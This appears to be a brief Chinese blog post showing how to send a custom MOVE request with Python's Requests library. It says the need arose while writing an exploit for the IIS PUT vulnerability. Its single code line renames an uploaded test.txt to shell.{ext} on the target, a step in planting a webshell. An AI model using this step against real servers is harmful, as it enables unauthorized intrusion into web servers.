python3 Requests模板没有MOVE请求方法问题的解决

使用Python编写IIS-PUT漏洞时,发现Requests没有MOVE请求方法

后来发现Requests模块的request方法是可以自定义请求方法的

下面就是利用request方法自定义MOVE请求方法

r = requests.request('MOVE', url=link + "/test.txt", headers={'Destination':link + "/shell.{0}".format(ext)})

你可能感兴趣的:(Python)